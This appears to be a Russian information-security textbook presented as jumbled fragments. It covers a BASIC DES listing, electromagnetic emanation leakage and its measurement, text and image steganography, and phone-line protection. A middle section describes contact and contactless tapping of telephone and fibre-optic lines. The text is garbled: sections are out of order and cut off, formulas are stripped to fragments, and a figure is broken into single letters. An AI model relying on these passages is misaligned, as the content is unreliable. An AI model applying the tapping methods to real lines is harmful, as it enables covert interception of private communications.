ELSE
ST$ = "0" + ST$
END IF
p% = p% \ 2
NEXT i%
MYBIN$ = ST$
END FUNCTION
SUB mrotate (keyr() AS INTEGER)
letbe XR(), keyr(), 56
FOR ir% = 56 TO 2 STEP -1
XR(ir%) = XR(ir% - 1)
NEXT ir%
XR(1) = keyr(28): XR(29) = keyr(56)
letbe keyr(), XR(), 56
END SUB
SUB sboxinit (b() AS INTEGER)
RESTORE sboxesl
FOR i% = 1 TO 8
FOR j% = 1 TO 64
READ b(i%, j%)
NEXT j%
NEXT i%
END SUB
SUB stob (a$, mbits() AS INTEGER)
FOR i% = 1 TO 8
b$ = MYBIN$(ASC(MID$(a$, i%, 1)))
FOR j% = 1 TO 8
mbits(((i% - 1) * 8) + j%) = ASC(MID$(b$, j%, 1)) - 48
NEXT j%
NEXT i%
END SUB
Продолжение листинга 18.4
SUB transpose (datax() AS INTEGER, T() AS INTEGER, nt%)
letbe XT(), datax(), 64
FOR i% = 1 TO nt%
datax(i%) = XT(T(i%))
NEXT i%
END SUB
SUB xtob (a$, mbits() AS INTEGER)
LOCAL X$,NIBBLE$
FOR i% = 1 to 16
X$ = MID$(a$,i%,1)
SELECT CASE X$
CASE "0"
NIBBLE$ = "0000"
CASE "1"
NIBBLE$ = "0001"
CASE "2"
NIBBLE$ = "0010"
CASE "3"
NIBBLE$ = "0011"
CASE "4"
NIBBLE$ = "0100"
CASE "5"
NIBBLE$ = "0101"
CASE "6"
NIBBLE$ = "0110"
CASE "7"
NIBBLE$ = "0111"
CASE "8"
NIBBLE$ = "1000"
CASE "9"
NIBBLE$ = "1001"
CASE "A"
NIBBLE$ = "1010"
CASE "B"
NIBBLE$ = "1011"
CASE "C"
NIBBLE$ = "1100"
CASE "D"
NIBBLE$ = "1101"
CASE "E"
Окончание листинга 18.4
NIBBLE$ = "1110"
CASE "F"
NIBBLE$ = "1111"
CASE ELSE
Print "Не является 16-ричным значением!"
SYSTEM
END SELECT
FOR j% = 1 to 4
mbits(((i% - 1) * 4) + j%) = ASC(MID$(NIBBLE$, j%, 1)) - 48
NEXT j%
NEXT i%
END SUB
Механизм возникновения ПЭМИ средствцифровой электронной техники
Побочные электромагнитные излучения, генерируемые электромагнитными устройствами, обусловлены протеканием дифференциальных и синфазных токов.
В полупроводниковых устройствах излучаемое электромагнитное поле образуется при синхронном протекании дифференциальных токов в контурах двух типов. Один тип контура формируется проводниками печатной платы или шинами, по которым на полупроводниковые приборы подается питание. Площадь контура системы питания примерно равна произведению расстояния между шинами на расстояние от ближайшей логической схемы до ее развязывающего конденсатора. Другой тип контура образуется при передаче логических сигналов от одного устройства к другому с использованием в качестве обратного провода шины питания. Проводники передачи данных совместно с шинами питания формируют динамически работающие контуры, соединяющие передающие и приемные устройства.
Излучение, вызванное синфазными токами, обусловлено возникновением падений напряжения в устройстве, создающем синфазное напряжение относительно земли.
Как правило, в цифровом электронном оборудовании осуществляется синхронная работа логических устройств. В результате при переключении каждого логического устройства происходит концентрация энергии в узкие совпадающие по времени импульсные составляющие, при наложении которых суммарные уровни излучения могут оказаться выше, чем может создать любое из отдельных устройств.
Большое влияние на уровни возникающих ЭМИ оказывают характеристики соединений с отрицательной шиной источника питания или с землей. Это соединение должно иметь очень низкий импеданс, поскольку и печатные проводники на ВЧ представляют собой скорее дроссели, чем коротко замкнутые цепи.
Во многих случаях основными источниками излучений оказываются кабели, по которым передается информация в цифровом виде. Такие кабели могут размещаться внутри устройства или соединять их между собой.
Применение заземляющих перемычек из оплетки кабеля или провода, характеризующихся большими индуктивностью и активным сопротивлением для ВЧ помех и не обеспечивающих хорошего качества заземления экрана, приводит к тому, что кабель начинает действовать как передающая антенна.
Метод эквивалентного приемника
Синтезируется приемник для восстановления информации, содержащейся в ПЭМИ. После калибровки такой приемник может быть использован для измерения уровней информационных излучений.
Каждый из методов обладает своими достоинствами и недостатками. В настоящее время наиболее приемлемым для практики методом оценки уровней информативных ПЭМИ представляется метод принудительной активизации.
Метод оценочных расчетов
Определяются элементы конструкции оборудования, в которых циркулируют опасные сигналы, составляются модели, производится оценочный расчет уровня излучений. Этот метод хорошо реализуется при наличии программного обеспечения для ЭВМ в виде экспертной системы, содержащей банк моделей излучателей.
Метод принудительной активизации
Активизируется (программно или аппаратно) канал (одна опасная цепь) эталонным сигналом, который позволяет идентифицировать излучения, и измеряются уровни возникающих ПЭМИ. Для измерений в данном методе могут быть использованы измерительные приемники и анализаторы спектра.
Методы генерации стеганограмм
В отличие от рассмотренных выше стеганометодов, где скрываемая информация внедряется в текстовый контейнер, существуют методы, которые полностью порождают стеганограмму на основе защищаемых данных. В таких методах секретная информация не внедряется в текст, а представляется полностью всей стеганограммой. Теоретическую основу для методов генерации стеганограмм разработал П. Вайнер в теории функций имитации. В стеганографии функции имитации применяются для того, чтобы скрыть идентичность сообщения путем изменения его статистических свойств.
Пусть имеется файл А, который состоит из символьных строк. Обозначим через р(t, a, A) вероятность того, что символ а находится в строке t файла A, а через р(×, a, A) и p(t, ×, A) — независимые вероятности того, что символ а или строка t, соответственно, существуют в A. Два файла А и B будем считать статистически эквивалентными в пределах e, если |p(t, ×, A) – p(t, ×, B)| < e для всех строк t, длина которых меньше чем n.
Методы и средства подключения
Самым простым является контактное подключение, например параллельное подключение телефонного аппарата, довольно широко распространенное в быту. Но контактное подключение такого типа легко обнаруживается за счет существенного падения напряжения, приводящего к ухудшению слышимости в основном телефонном аппарате. В техническом отношении метод контактного подключения заключается в том, что он реализуется непосредственным включением в провода телефонного либо телеграфного аппаратов.
Более совершенным является подключение к линиям связи или проводам с помощью согласующего устройства (рис. 12.8).
Рис. 12.8. Подключение к линии связи с помощью согласующего устройства
Рис. 12.9. Подключение к линии связи с компенсацией падения напряжения |
Известен способ контактного подключения аппаратуры к линиям связи с компенсацией падения напряжения. Прослушивающая аппаратура и компенсирующий источник напряжения при этом способе включается в линию последовательно, как это показано на рис. 12.9.
Известен и способ перехвата передач с помощью включения в линию низкоомного чувствительного реле (рис. 12.10).
Рис. 12.10. Подключение к линии связи с помощью низкоомного реле
Контакты реле замыкают местную цепь телефонного аппарата в соответствии с током, проходящим по линии. Механическое реле может применяться на низких скоростях телеграфирования, на более высоких же скоростях (факс, линии передачи данных) используются электронные реле. При этом не исключается применение усилителей тока для устойчивости работы аппаратуры перехвата.Бесконтактное подключение к линии связи осуществляется двумя способами:
за счет электромагнитных наводок на параллельно проложенных проводах рамки;
с помощью сосредоточенной индуктивности, охватывающей контролируемую линию.
В обоих случаях прослушивание реализуется за счет электромагнитной индукции. Когда имеется двухпроводная телефонная линия с разнесенными неперевитыми проводами (так называемая “лапша”), она индуцирует ЭДС в параллельных проводах, т.е.
прослушивается. В схеме, представленной на рис. 12.11, I1, I2 — токи в двухпроводной телефонной линии; d1, d2, d3 и d4 — расстояния между рамкой и проводами прослушиваемой линии.
Ток I1 индуцирует в рамке ток одного направления (контурные стрелки), а ток I2 индуцирует ток противоположного направления (затушеванные стрелки). Следовательно, в рамке будет циркулировать ток I, равный разности индуцированных токов. Этот ток, попадая в усилитель поста прослушивания, усиливается и поступает на головные телефоны и магнитофон.
ЭДС, наведенная в рамке, будет тем больше, чем больше активная длина рамки L, чем больше разнос проводов двухпроводной линии и чем ближе к линии находится рамка.
Рис. 12.11. Прослушивание двухпроводной линии на рамке
Если вблизи телефонной линии расположить симметричный индукционный датчик, выполненный в виде трансформатора (рис. 12.12), то в нем будет наводиться ЭДС, значение которой определяется мощностью передаваемого по линии сигнала и расстоянием между обмотками и линией. Принятый индукционным датчиком сигнал может быть усилен усилителем (селективным) звуковых частот.
Качество принимаемого сигнала определяется подбором характеристик индукционного датчика, коэффициентом усиления и настройкой усилителя НЧ и, обязательно, регулируемой полосой пропускания. Это позволяет отфильтровывать другие сигналы наводок и помех и качественно выделить собственно интересующий сигнал.
Рис. 12.12. Подключение к линии индукционного датчика
Контактное и бесконтактное подключение возможно и к линиям волоконно-оптической связи (ВОЛС). Для контактного подключения удаляют защитный слой кабеля, стравливают светоотображающую оболочку и изгибают оптический кабель на необходимый угол (рис. 12.13).
Рис. 12.13. Вариант контактного подключения к ВОЛС
При таком подключении к ВОЛС обнаружить утечку информации за счет ослабления мощности излучения бывает очень трудно, так как чтобы прослушать переговоры при существующих приемных устройствах несанкционированного доступа, достаточно отобрать всего 0,001% передаваемой мощности.При этом дополнительные потери, в зависимости от величины изгиба кабеля, составляют всего 0,01–1,0 дБ.
Бесконтактное подключение к ВОЛС осуществляется следующим образом (рис. 12.14):
Рис. 12.14. Вариант бесконтактного подключения к ВОЛС
в качестве элемента съема светового сигнала используется стеклянная трубка, заполненная жидкостью с высоким показателем преломления и с изогнутым концом, жестко фиксированная на оптическом кабеле, с которого предварительно снята экранная оболочка;
на отогнутом конце трубки устанавливается объектив, фокусирующий световой поток на фотодиод, а затем этот сигнал подается на усилитель звуковых сигналов.
Методы и средства защиты информации
1. Андрианов В.И., Бородин В.А., Соколов А.В. “Шпионские штучки” и устройства для защиты объектов и информации. Справочное пособие. — С.-Пб.: Лань, 1996. — 272 с.
2. Анин Б.Ю., Петрович А.И. Радиошпионаж. — М.: Международные отношения, 1996. — 448 с. Предпринимательство и безопасность/Под ред. д.ю.н. Ю.Б. Долгополова. В 2-х кн. — М.: Издательство “Универсум”, 1991.
3. Барабаш А.В., Шанкин г.п. История криптографии. Ч.l. — М.: Гелиос АРВ, 2002. — 240 с.
4. Батурин Ю.М., Жодзишский Н.М. Компьютерная преступность и компьютерная безопасность. — М.: Юрид. лит., 1991. — 160 с.
5. Безопасность связи в каналах телекоммуникаций. — М.: 1992, — 124 с.
6. Бендат Дж., Тирсол А. Прикладной анализ случайных данных: Пер. с англ. — М.: Мир, 1989. — 540 с.
7. Бизнес и безопасность. 1996–2003 гг., №№ 1–6.
8. Болдырев А.И., Василевский И.В., Сталенков С.Е. Методические рекомендации по поиску и нейтрализации средств негласного съема информации. Практическое пособие. — М.: НЕЛК, 2001. — 138 с.
9. Вартанесян В.А. Радиоэлектронная разведка. — М.: Воениздат, 1975. — 255 с.
10. Введение в криптографию/Под общей ред. В.В. Ященко. — С-Пб.: Питер, 2001. — 288 с.
11. Вербицький О.В. Вступ до криптології. — Львів: Видавництво науково-технічної літератури, 1998. — 248 с.
12. Вєртузаев М.С., Юрченко О.М. Захист інформації в комп'ютерних системах від несанкціонованого доступу: Навч. посiбник/За ред. С.Г. Лаптєва. — К.: Видавництво Європейського університету, 2001. — 201 с.
13. Всемирная история шпионажа/Авт.-сост. М.И. Ушаков. — М.: Олимп; ООО “Фирма «Издательство АСТ»”, 2000. — 496 с.
14. Гавриш В.А. Практическое пособие по защите коммерческой тайны. — Симферополь: Таврида, 1994. — 112 с.
15. Герасименко В.А. Защита информации в автоматизированных системах обработки данных. В 2-х кн. — М.: Энергоатомиздат, 1994.
16. Герасименко В.А., Малюк А.А. Основы защиты информации. — М.: МГИФИ, 1997. — 538 с.
17. Грушо А.А., Тимонина Е.Е. Теоретические основы защиты информации. — М.: Яхтсмен, 1996.
— 67 с.
18. Гурвич И.С. Защита ЭВМ от внешних помех. — М.: Энергия, 1975. — 158 с.
19. Домарев В.В. Безопасность информационных технологий. Методология создания систем защиты. — К.: ООО “ДС”, 2001. — 688 с.
20. Домарев В.В. Защита информации и безопасность компыотерных систем. — К.: Издательство ДиаСофт, 1999. — 480 с.
21. Дориченко С.А., Ященко В.В. 25 этюдов о шифрах. — М.: ТЕИС, 1994. — 69 с.
22. Жельников В. Криптография от папируса до компьютера. — М.: ABF, 1996. — 336 с.
23. Зарубежная радиоэлектроника. Специальный выпуск. 1989, N2 12.
24. Захист інформації. 1999–2003 гг., №№ 1–4.
25. Защита информации “Конфидент”. 1995–2003 гг., №№ 1–6.
26. Защита программного обеспечения. Пер. с англ./Д. Гроувер, Р. Сатер, Дж. Фипс и др.; Под ред. Д. Гроувера. — М.: Мир, 1992. — 285 с.
27. Зегжда Д.П., Ивашко А.М. Основы безопасности информационных систем. — М.: Горячая линия — Телеком, 2000. — 452 с.
28. Зегэнда Д.П. и др. Защита информации в компьютерных системах/Под ред. проф. Э.М. Шмакова. — С.- Пб.: СПб ГТУ, 1992. — 100 с.
29. Изделие “УИП-88”. Техническое описание и инструкция по эксплуатации. СШКИ 468 222.001 ТО. Барсуков В.С., Дворянкин С.В., Шеремет А.И. Серия “Технолоrия электронных коммуникаций”. Том 20.
30. Каторин Ю.Ф., Куренков Е.В., Лысов А.В., Остапенко А.Н. Большая энциклопедия промышленного шпионажа. — С.-Пб.: ООО “Издательство Полигон”, 2000. — 896 с.
31. Князев А.Д. Элементы теории и практики обеспечения электромагнитной совместимости радиоэлектронных средств. — М.: Радио и связь, 1984. — 336 с.
32. Коржик В.И., Кушнир Д.В. Теоретические основы информационной безопасности телекоммуникационных систем. — С.-Пб.: СПбГУТ, 2000. — 134 с.
33. Куликов Е.И., Трифонов АЛ. Оценка параметров сигналов на фоне помех. — М.: Сов. радио, 1978. — 296 с.
34. Лагутин В.С. Петряков А.В. Утечка и защита информации в телефонных каналах. — М.: Энерrоатомиздат, 1996. — 304 с.
35. Ли У. Техника подвижных систем связи: Пер. с англ. — М.: Радио и связь, 1985. — 392 с.
36. Мельников В.В. Защита информации в компьютерных системах. — М.: Финансы и статистика; Электронинформ, 1997. — 368 с.
37. Михайлов А.С. Измерение параметров ЭМС РЭС. — М.: Связь, 1980. — 216 с.
38. Омельченко В.А. Распознавание сигналов по спектру в условиях априорной неодиородиости. Харьков: Издательство Харьковского университета, 1979. — 100 с.
39. Организация и coвpeмeнные методы защиты информации/Под общ. ред. С.А. Диева, A.Г. Шаваева. — М.: Коцерн “Банковский Деловой Центр”, 1998. — 472 с.
40. Петраков А.В. Основы практической защиты информации. — М.: Радио и связь, 1999. — 368 с.
41. Петряков А.В., Лагутин В.С. Защита абонентского телетрафика. — М.: Радио и связь, 2001. — 504 с.
42. Полмар Н., Аллен Т.Б. Энциклопедия шпионажа/Пер. сангл. В. Смирнова. — М.: КРОН-ПРЕСС, 1999. — 816 с.
43. Помехозащищенность радиосистем со сложными сигналами/Г.И. Тузов, В.А. Сивов, В.И. Прытков и др. Под ред. Г.И. Тузова. — М.: Радио и связь, 1985. — 264 с.
44. Расторгуев С.П., Дмитриевский Н.Н. Искусство защиты и “раздевания” программ. — М.: Совмаркет, 1991. — 60 с.
45. Романец Ю.В., Тимофеев П.А., Шаньгин В.Ф. Защита информации в компьютерных системах и сетях/Под ред. В.Ф. Шаньгина; 2-е изд., перераб. и доп. — М.: Радио и связь, 2001. — 376 с.
46. Росоловський В.М., Анкудович Г.Г., Катерноза К.О., Шевченко М.Ю. Основи інформаційної безпеки автоматизованої інформаційної системи державної податкової служби України: Навч. посiбник/За ред. М.Я. Азарова. — Ірпінь: Академія ДПС України, 2003. — 466 с.
47. Соловьев Э.Я. Коммерческая тайна и ее защита. — М.: ИВФ Антал, 1996. — 64 с.
48. Спесивцев А.В., Вегнер В.А., Крутяков А.Ю., Серегин В.В., Сидоров В.А. Защита информации в персональных ЭВМ. — М.: Радио и связь, 1992. —190 с.
49. Специальная техника. 1998–2003 гг., №№ 1–6.
50. Стенг Д., Мун С. Секреты безопасности сетей/Пер. с англ. под ред. А.А. Чекаткова. — К.: Диалектика, 1995. — 544 с.
51. Сунь-Цзы. Трактат о военном искусстве/Сунь-Цзы, У-Цзы; Пер. с кит., предисл.
и коммент. Н.И. Конрада. — М.: ООО “Издательство АСТ”; С.-Пб.: Terra Fantastica, 2002. — 558 с.
52. Теория и методы оценки электромагнитной совместимости радиоэлектронных средств/Ю.Я. Феоктистов, В.В. Матасов, Л.И. Башурин, В.И. Селезнев; Под ред. Ю.А. Феоктистова. — М.: Радио и связь, 1998. – 216 С.
53. Теплов Н.Л. Теория передачи сигналов по электрическим каналам связи. — М.: Воениздат, 1976. — 420 с.
54. Хант Ч., Зартарьян В. Разведка на службе вашего предприятия. — К.: Укрзакордонвизасервис, 1992. — 158 с.
55. Харкевич А.А. Борьба с помехами. — М.: Наука, 1965. — 274 с.
56. Хорев А.А. Защита информации от утечки по техническим каналам. Ч.1. Технические каналы утечки информации. Учебное пособие. — М.: Гостехкомиссия России, 1998. — 320 с.
57. Хорев А.А. Способы и средства защиты информации. — М.: МО РФ, 2000. — 316 с.
58. Хорошко В.А., Шелест М.Е. Введение в компьютерную стеганографию. — К.: НАУ, 2002. — 140 с.
59. Хорошко В.О., Азаров О.Д., Шелест М.Е., Яремчук Ю.Е. Основи комп’ютерної стеганографії: Навч. посібник. — Вінниця: ВДТУ, 2003. — 143 с.
60. Шаповалов П.П. Практическое руководство по поиску устройств съема и передачи информации. — М.: АО “Щит”, 2000. — 52 с.
61. Щербаков А. Построение программных средств защиты от копирования. Практические рекомендации. — М.: Издательство Эдэль, 1992. — 80 с.
62. Щербаков А. Разрушающие программные воздействия. — М.: Издательство Эдэль, 1993. — 64 с.
63. Энциклопедия промышленного шпионажа/Ю.Ф. Каторин, Е.В. Куренков, А.В. Лысов, А.Н. Остапенко; Под общ. ред. Е.В. Куренкова. — С.-Пб.: ООО "Издательство Полигон", 1999. — 512 с.
64. Ярочкин В.И. Безопасность информационных систем. — М.: Ось-86, 1996. — 320 с.
65. Ярочкин В.И. Коммерческая информация фирмы. — М.: Ось-89. — 96 с.
66. Ярочкин В.И. Технические каналы утечки информации. — М.: ИПКИР, 1994. — 112 с.
[1] Книга Чисел
[2] Книга Иисуса Навина
[3] Евангелие от Матфея
Методы и средства защиты телефонных линий
Все системы защиты телефонных линий делятся на пассивные и активные.
Методы искажения
Методы искажения, в отличие от предыдущих методов, требуют знания о первоначальном виде контейнера. Схема сокрытия заключается в последовательном проведении ряда модификаций контейнера, которые выбираются в соответствии с секретным сообщением. Для извлечения скрытых данных необходимо определить все различия между стеганограммой и исходным контейнером. По этим различиям восстанавливается последовательность модификаций, которые выполнялись при сокрытии секретной информации. В большинстве приложений такие системы бесполезны, поскольку для извлечения данных необходимо иметь доступ к набору первоначальных контейнеров: если противник также будет иметь доступ к этому набору, то он сможет легко обнаружить модификации контейнера и получить доказательства скрытой переписки. Таким образом, основным требованием при использовании таких методов является необходимость распространения набора исходных контейнеров между абонентами сети через секретный канал доставки.
Методы искажения легко применимы к цифровым изображениям. Как и в методах замены, для сокрытия данных выбирается l(m) различных пикселей контейнера, которые используются для сокрытия информации. Такой выбор можно произвести, используя датчик случайных чисел (или перестановок). При сокрытии бита 0 значение пикселя не изменяется, а при сокрытии 1 к цвету пикселя прибавляется случайное значение Dх. Хотя этот подход подобен методу замены, имеется одно существенное различие: в методе LSB значение выбранного цвета не обязательно равняется секретному биту сообщения, а в методах искажения при сокрытии нулевого бита не происходит никаких изменений. Помимо этого, значение Dх может быть выбрано так, что будут сохраняться статистические свойства контейнера. Для извлечения скрытых данных необходимо провести сравнение всех l(m) выбранных пикселей стеганограммы с соответствующими пикселями исходного контейнера. Если i-й пиксель будет отличаться, то это свидетельствует о том, что в скрытом сообщении был единичный бит, иначе — нулевой.
Существует еще один подход к реализации метода искажения изображения при сокрытии данных. В соответствии с данным методом при вставке скрываемых данных делается попытка скорее изменить порядок появления избыточной информации в контейнере, чем изменить его содержимое. При сокрытии данных составляется определенный “список пар” пикселей, для которых отличие будет меньше порогового. Этот список играет роль стегоключа — без него нельзя восстановить секретное сообщение. Если абонент имеет доступ к “списку пар”, он всегда сможет провести обратную процедуру.
Методы искажения формата текстового документа
Сокрытие данных путем изменения формата текстовых файлов обычно проводится так, чтобы стандартные текстовые редакторы не смогли выявить признаков присутствия дополнительной информации. Рассмотренные ниже методы манипулируют интервалами между словами и предложениями или же пробелами в конце текстовых строк. Использование пробелов для сокрытия данных обусловлено следующими причинами. Во-первых, введение дополнительных пробелов не вносит больших изменений в значение фразы или предложения. Во-вторых, у случайного читателя вряд ли сразу возникнет подозрение относительно вставленных дополнительных пробелов.
Сокрытие тайного сообщения (в битовом представлении) можно проводить путем добавления одного или двух символов пробела в конце предложений после символа конца (например, точки — для натурального языка или точки с запятой — для кода программы на языке C): один дополнительный пробел кодирует значение бита “0”, а два — “1”. Этот простой метод имеет недостатки. Во-первых, он не эффективен, т.к. необходим контейнер большого объема (скорость передачи скрытых данных в данном случае приблизительно равна одному биту на 160 байт текста). Во-вторых, возможность сокрытия зависит от структуры текста (некоторые тексты, например белые стихи, не имеют четких признаков конца). В-третьих, текстовые редакторы часто автоматически добавляют символы пробела после точки.
Кодировать секретные данные можно дополнительными пробелами в конце каждой строчки текста (рис. 20.3): два бита кодируются одним пробелом, четыре — двумя, восемь — тремя и т.д. Преимущество такого метода кодирования состоит в том, что оно может быть выполнено с любым текстом; изменения в формате резко не бросаются в глаза читателю, обеспечивается передача большего количества скрытых данных по сравнению с предыдущим методом (1 бит на 80 байт). Недостаток метода состоит в том, что некоторые программы (например, sendmail) могут неосторожно удалять дополнительные пробелы. Помимо этого, скрытые таким образом данные не всегда могут быть восстановлены с печатной копии документа.
М |
ы |
р |
е |
д |
к |
о |
д |
о |
к |
о |
н |
ц |
а |
п |
о |
- |
||||||
н |
и |
м |
а |
е |
м |
, |
ч |
т |
о |
м |
ы |
|
д |
е |
й |
с |
т |
- |
||||
в |
и |
т |
е |
л |
ь |
н |
о |
х |
о |
т |
и |
м |
. |
М |
ы |
р |
е |
д |
к |
о |
д |
о |
к |
о |
н |
ц |
а |
п |
о |
- |
||||||
н |
и |
м |
а |
е |
м |
, |
ч |
т |
о |
м |
ы |
|
д |
е |
й |
с |
т |
- |
||||
в |
и |
т |
е |
л |
ь |
н |
о |
х |
о |
т |
и |
м |
. |
Пример сокрытия данных пробелами в конце текстовых строк
Еще один метод сокрытия данных с помощью пробелов манипулирует с текстами, которые выровнены с обеих сторон. В этом методе данные кодируются путем управляемого выбора мест для размещения дополнительных символов пробела. Один символ между словами интерпретируется как 0, а два — как 1. Метод позволяет встраивать несколько бит скрытой информации в каждую строку текста (рис. 20.4).
Рис. 20.4. Пример сокрытия битового сообщения 0110º100011010110
Поскольку текст часто выравнивается по ширине листа, не каждый промежуток между словами может использоваться для кодирования скрытых данных. Для того чтобы определить, в каком из промежутков между словами спрятана информация, а какие промежутки являются частью оригинального текста, используется следующий метод декодирования. Битовая строка, которая извлекается из стеганограммы, разбивается на пары. Пара бит 01 интерпретируется как 1; пара 10 — как 0; а биты 00 и 11 являются пустыми, т.е. такими, которые не несут никакой информации. Например, битовое сообщение 1000101101 сокращается до 001, а строка 110011 — будет пустой.
Рассмотренные методы работают успешно до тех пор, пока тексты представлены в коде ASCII. Существуют также стеганографические методы, которые интерпретируют текст как двоичное изображение. В данных методах скрываемая информация кодируется изменением расстояния между последовательными строками текста или словами.
Сокрытие данных происходит путем выбора местоположения строк в документе, которые сдвигаются вверх или вниз в соответствии с битами скрываемых данных. При этом некоторые строки оставляют для синхронизации на месте (например, каждую вторую). В этом случае один секретный бит сообщения кодируется сдвигом одной строки. Если строка сдвинута, то значение секретного бита равно 1, иначе — 0.
Извлечение скрытого сообщения проводится путем анализа расстояний между центрами строк, которые расположены рядом. Обозначим через DR+ — расстояние между центрами сдвинутой строки и предыдущей неизмененной строки (синхрострока), DR–
— расстояние между центрами сдвинутой линии и последующей синхростроки, а через DХ+ и DХ– — соответствующие расстояния в исходном документе. Тогда, если расстояние между строками было увеличено, то
>
Аналогично, если расстояние было уменьшено, то
<
Отметим, что данный метод нечувствителен к изменению масштаба документа, что обеспечивает ему хорошую устойчивость к большинству искажений, которые могут иметь место при активных атаках.
Другая возможная схема сокрытия путем сдвига слов отформатированного текста показана на рис. 20.5. В соответствии с этой схемой изменяется горизонтальная позиция начала слов. Теоретически, можно использовать изменение каждого промежутка между словами. Для того чтобы обеспечить сохранение первоначального выравнивания текста, необходимо соблюдать единственное ограничение: сумма всех сдвигов в одной строке должна равняться нулю.
Рис. 20.5. Пример сокрытия данных в промежутках между словами (для наглядности указаны вертикальные линии)
Существуют более тонкие методы сокрытия информации в текстовой среде. В некоторых текстовых редакторах реализованы опции, которые проводят автоматическое форматирование текста в соответствии с определенными критериями. Например, редактор ТЕХ использует сложный алгоритм вычисления конца строки или страницы. Фактически вычисляются некоторые специальные параметры, по которым определяется место перехода с одной строки или страницы на другую.
Один из таких параметров оценивает количество пробелов, которые необходимо вставить, чтобы сохранить заданный стиль документа; другой — оценивает эстетический вид документа при выборе переноса и т.д. В результате ТЕХ пытается выбрать последовательность мест переносов таким образом, что сумма всех параметров, которые относятся к редактируемому параграфу, была минимальной. Изменяя некоторые значения параметров, можно управлять выбором мест переносов и использовать их для сокрытия данных.
До сих пор вопрос о создании безопасной лингвистической стегосистемы остается открытым. Любая обработка текста редактором, его печать или перевод в другой формат (HTML, PostScript, PDF или RTF) может изменить расположение пробелов и уничтожить скрытый текст. Низкая устойчивость подобных методов к возможным модификациям документа является одной из причин поиска других методов поиска данных в тексте.
Синтаксические и семантические методы в корне отличаются от рассмотренных выше, но могут использоваться одновременно с ними.
Методы измерения уровня ПЭМИ
При проведении специальных исследований необходимо измерять уровень ПЭМИ и рассчитать радиус зоны R2, характеризующий минимальное расстояние от технических средств, на границе и за пределами которого отношение сигнал/шум не превышает нормированного значения (рис. 11.3). В общем случае это расстояние может находиться в ближней, промежуточной или дальней (волновой) зоне.
В пределах каждой из зон затухание электромагнитной волны описывается различными аналитическими зависимостями. Для получения объективной величины следует правильно определять границы зон.
В настоящее время границы зон определяются условно, без достаточного математического или электродинамического обоснования. Так в качестве границы ближней зоны некоторые авторы принимают величину ?/2?, а дальней — ?. В ряде случаев ошибочно принимается, что в промежуточной зоне напряженность электрического поля обратно пропорциональна квадрату расстояния от источника побочных излучений. Таким образом, при расчете радиуса R2 допускаются методические погрешности, что недопустимо при организации защиты информации ограниченного распространения от утечки за счет побочных электромагнитных излучений. Для многих технических средств обработки информации (ПЭВМ и др.) характерна большая величина амплитуды напряжения опасного сигнала и малая величина амплитуды тока. Такие источники относятся к электрическим излучателям.
Рис. 11.3. Определение радиуса зоны R2
Технические средства обработки информации полагаем точечным электрическим излучателем, поскольку его размеры существенно меньше расстояния до точки возможного перехвата информации. Представим техническое средство обработки информации в виде диполя, размещенного в точке О сферической системы координат, как показано на рис. 11.4.
Математические выражения для определения параметров поля источников ПЭМИ можно получить из классической теории технической электродинамики, используя выражение для векторного потенциала. Известно, что векторы напряженности магнитного Н и электрического Е полей связаны с векторным потенциалом зависимостями:
H = ´ rotA , E = rot rotA
Здесь
A = ,
где e — абсолютная комплексная диэлектрическая проницаемость;
m — абсолютная магнитная проницаемость среды; I — ток в проводнике; l
— длина проводника; r — расстояние от излучателя до измерительной антенны (точка наблюдения); k — волновое число.
Рис. 11.4. Модель излучателя электромагнитного поля
Разложим векторный потенциал на радиальную (A), угломестную (A) и азимутальную (A) составляющие:
A = I l cosq, A = – I l sinq, A = 0
В сферической системе координат составляющие вектора напряженности электрического поля описываются следующими выражениями:
E = –i e cosq (11.1)
E = –i e sinq (11.2)
E = 0
Вектор напряженности электрического поля имеет вид E = rE + qE. Силовые лини вектора E лежат в меридиональных плоскостях. Составляющая E достигает максимального значения при q = p/2 в экваториальной плоскости и равна нулю на оси диполя. Поэтому измерения ПЭМИ необходимо осуществлять в направлении максимального излучения технического средства при q = p/2. Составляющая E пропорциональна cosq и достигает максимума на оси диполя, а в экваториальной плоскости равна нулю.
С учетом волнового сопротивления среды без потерь
r = , скорости распространения
n = и длины волны l = ,
выражение (11.2) для E можно представить в виде:
E = r I l (11.3)
При измерении напряженности электрической составляющей поля с помощью селективных микровольтметров используется режим пикового или квазипикового детектирования. В этом случае амплитуда напряженности электрической составляющей поля может быть выражена следующим образом:
E = , где (11.4)
E= r , E = r , E = r
Пространство вокруг точечного излучателя условно разделяется на три зоны — ближнюю промежуточную и дальнюю.Характер зависимости амплитуды электрической составляющей от дальности зависит от того, в какой зоне расположена точка наблюдения.
Рассмотрим зависимости амплитуды электрической составляющей в ближней, промежуточной и дальней зонах.
Методы контроля проводных линий
Методы контроля проводных линий, как слаботочных (телефонных линий, систем охранной и пожарной сигнализации и т.д.), так и силовых, основаны на выявлении в них информационных сигналов (низкочастотных и высокочастотных) и измерении параметров линий.
Использование того или иного метода контроля определяется типом линии и характеристиками аппаратуры контроля.
Методы контроля телефонных линий, как правило, основаны на том, что любое подключение к ним вызывает изменение электрических параметров линий: амплитуд напряжения и тока в линии, а также значений емкости, индуктивности, активного и реактивного сопротивлений линии. В зависимости от способа подключения закладного устройства к телефонной линии (последовательного, в разрыв одного из проводов телефонного кабеля, или параллельного), степень его влияния на изменение параметров линии будет различной.
Рис. 16.6. Схема включения постановщика помех в офисную телефонную сеть
За исключением особо важных объектов линии связи построены по стандартному образцу. Ввод линии в здание осуществляется магистральным многопарным (многожильным) телефонным кабелем до внутреннего распределительного щита. Далее от щита до каждого абонента производится разводка двухпроводным телефонным проводом марки ТРП или ТРВ. Данная схема характерна для жилых и административных зданий небольших размеров. При больших размерах административных зданий внутренняя разводка делается набором магистральных кабелей до специальных распределительных колодок, от которых на небольшие расстояния (до 20–30 м) разводка также производится проводом ТРП или ТРВ.
В статическом режиме любая двухпроводная линия характеризуется волновым сопротивлением, которое определяется погонными емкостью (пФ/м) и индуктивностью (Гн/м) линии. Волновое сопротивление магистрального кабеля лежит в пределах 130–160 Ом для каждой пары, а для проводов марки ТРП и ТРВ имеет разброс 220–320 Ом.
Подключение средств съема информации к магистральному кабелю (как наружному, так и внутреннему) маловероятно.
Наиболее уязви мыми местами подключения являются: входной распределительный щит, внутренние распределительные колодки и открытые участки из провода ТРП, а также телефонные розетки и аппараты. Наличие современных внутренних мини-АТС не влияет на указанную ситуацию.
